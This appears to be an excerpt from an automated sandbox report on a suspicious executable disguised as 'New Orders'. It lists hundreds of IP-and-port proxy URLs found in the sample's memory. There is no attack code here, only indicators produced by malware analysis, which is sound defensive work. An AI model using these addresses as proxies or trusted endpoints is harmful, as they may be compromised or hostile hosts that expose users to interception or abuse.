                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.115.79.195:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.115.79.195:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.118.52.129:3629
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.118.52.129:3629://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.119.227.65:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.119.227.65:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.192.65.34:5020
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.192.65.34:5020://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.194.189.40
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.194.189.40://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.194.189.40:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.144.158:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.144.158:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.213.141.107:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.213.141.107:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.96.11:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.96.11:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.8.230.197:8187
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.8.230.197:8187://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.88.166.218:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.88.166.218:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.99.2.43:1081
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.99.2.43:1081://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.104.16.118:14880
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.104.16.118:14880://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.161.223:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.161.223:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.206
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.206.40:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.206.40:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.89.10:8090
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.89.10:8090://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.128.212
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.128.212.190:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.128.212.190:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.208:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.208:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.211:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.211:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2667F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.153.33.94
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2667A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.153.33.94://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.153.33.94:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.159.120.74:58080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.159.120.74:58080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.229.210
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.229.210.50:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.229.210.50:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.231.245.182:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.231.245.182:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.157:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.157:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.158:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.158:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2573E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2576C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.226:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2576C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.226:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.224:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD282AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.224:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.83.242:3177
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.83.242:3177://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.55.247.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.55.247.41:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.55.247.41:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD265C2000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.69.118.177:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD265F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.69.118.177:8080://proxyp
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.72.82.47:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.72.82.47:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.86.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.86.64.1:3629
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.86.64.1:3629://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.91.76.34:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.91.76.34:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.45.156:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.45.156:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD264BB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD264D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.78.9:26316
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD264C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.78.9:26316://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.230.243:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.230.243:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.253.35:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.253.35:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.148.69:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.148.69:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.156.219:8000
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.156.219:8000://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.172
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.172.154:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.172.154:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.207.96:18877
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.207.96:18877://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:33225
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:33225://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.141.249.246:8081
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.141.249.246:8081://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.158.166.161:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.158.166.161:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.158.197.147:3629
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.158.197.147:3629://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.48.80:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.48.80:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.51.79:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.51.79:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.23.192.249:8901
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.23.192.249:8901://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.122.164:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.122.164:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.246.53:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.246.53:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.245.145.234:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.245.145.234:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26574000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.251.111.18:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.251.111.18:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.253.201.11:9125
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.253.201.11:9125://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.254.18.11:57335
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.254.18.11:57335://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.156:1951
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.156:1951://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.54.21.203:8081
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.54.21.203:8081://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.65.171.6:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.65.171.6:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.133.33:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.133.33:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.17:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.17:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.27:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.27:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.109.193.228:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.109.193.228:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.125.51.54:27234
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.125.51.54:27234://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259D1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.8.16:8088
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.8.16:8088://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.93.198:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.93.198:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.94.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.94.238:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.94.238:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.48.80.9:8085
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.48.80.9:8085://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2979C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.49.160.32:999
